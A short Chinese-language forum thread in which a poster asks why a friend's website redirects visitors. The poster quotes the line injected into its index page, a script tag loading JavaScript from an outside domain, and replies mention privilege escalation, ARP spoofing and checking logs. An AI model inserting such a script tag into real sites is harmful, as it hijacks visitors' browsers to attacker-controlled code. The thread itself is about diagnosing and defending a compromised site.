关于网站被黑被跳转
貌似最近黑客活动的比较频繁有朋友的网站经常被跳转,就是在index加了句
<script language="javascript" src="http://www.googletracing.com/index.php?i=louisvuitton"></script>
是用这句JS去调用另一个页面的跳转代码来跳转吗?
已经把写入权限关了都还能修改index是怎么回事?
大家对网站安全方面有没有什么心得可以分享一下呢? 即使你限制了权限,一旦入侵并提权依然可写,只要提的权限够高,一切可写。
另如果是被ARP攻击也可插入代码且无须侵入主机,同一VLAN内即可。
查被修改网站的最近access和error日志吧 使用谷歌cdn加速,屏蔽掉真是IP
页:
[1]
